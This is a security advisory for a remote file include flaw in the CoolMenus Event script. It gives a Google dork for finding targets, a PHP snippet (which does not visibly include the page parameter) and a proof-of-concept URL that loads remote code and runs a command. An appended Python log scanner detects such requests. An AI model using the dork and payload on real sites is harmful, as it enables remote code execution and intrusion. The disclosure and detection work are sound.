Original Advisory : 
http://kurdishsecurity.blogspot.com/2006/04/coolmenus-event-remote-file-include.html


#CoolMenus Event Remote File Include Vulnerability#

#Website : http://coolmenus.dhtmlcentral.com/projects/coolmenus [Closed]

#Script : CoolMenus v4.0 Event Script

#Risk : High

#Class : Remote

#Greetz : B3g0k,Nistiman,Flot,Netqurd etc..

#d0rk : "/event/index.php?page=" 


I.



require("event_inc.php");
echo "Events";
$start = filectime($news);
$jetzt = time();
$update = "$start"+"$timespan";
if($jetzt >= $update)
{include("event_html.php");}


II.


Proof of Concept:


http://www.site.com/[path]/event/index.php?page=evilcode.txt?&cmd=uname -a
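
A defender's check for the request shape in the proof of concept, as an added example that is not part of the original advisory: it scans web access logs for requests to /event/index.php whose page value is a URL. The log lines, IP addresses and host names are constructed, and the combined log format is an assumption.

```python
import re
from urllib.parse import parse_qsl

# Constructed access-log lines (combined log format); IPs and hosts are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Apr/2006:10:01:02 +0000] "GET /event/index.php?page=march HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [12/Apr/2006:10:03:17 +0000] "GET /cms/event/index.php?page=http://files.example.invalid/evilcode.txt?&cmd=uname%20-a HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.0.2.44 - - [12/Apr/2006:10:03:40 +0000] "GET /cms/event/index.php?page=HTTP%3A%2F%2Ffiles.example.invalid%2Fevilcode.txt%3F&cmd=id HTTP/1.1" 200 640 "-" "Mozilla/5.0"
192.0.2.77 - - [12/Apr/2006:10:05:00 +0000] "GET /news/index.php?page=http://www.example.invalid/ HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

# client IP, timestamp, request target, status code
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3})')
# A page value that begins with a URL scheme points the script at remote content.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*://|data:)', re.I)
SCRIPT_SUFFIX = "/event/index.php"  # script path named in the advisory


def find_remote_includes(log_text):
    """Return one finding per Event-script request whose page value is a URL."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        ip, when, target, status = m.groups()
        path, _, query = target.partition("?")
        if not path.lower().endswith(SCRIPT_SUFFIX):
            continue  # a different script; out of scope for this rule
        # parse_qsl percent-decodes once, matching the value PHP hands to the script.
        params = parse_qsl(query, keep_blank_values=True)
        for name, value in params:
            if name == "page" and REMOTE_RE.match(value):
                extra = sorted(n for n, _ in params if n != "page")
                findings.append({"ip": ip, "time": when, "page": value,
                                 "status": int(status), "extra_params": extra})
    return findings


if __name__ == "__main__":
    for finding in find_remote_includes(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged request only shows that the script answered, so each finding still needs to be followed up on the host.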
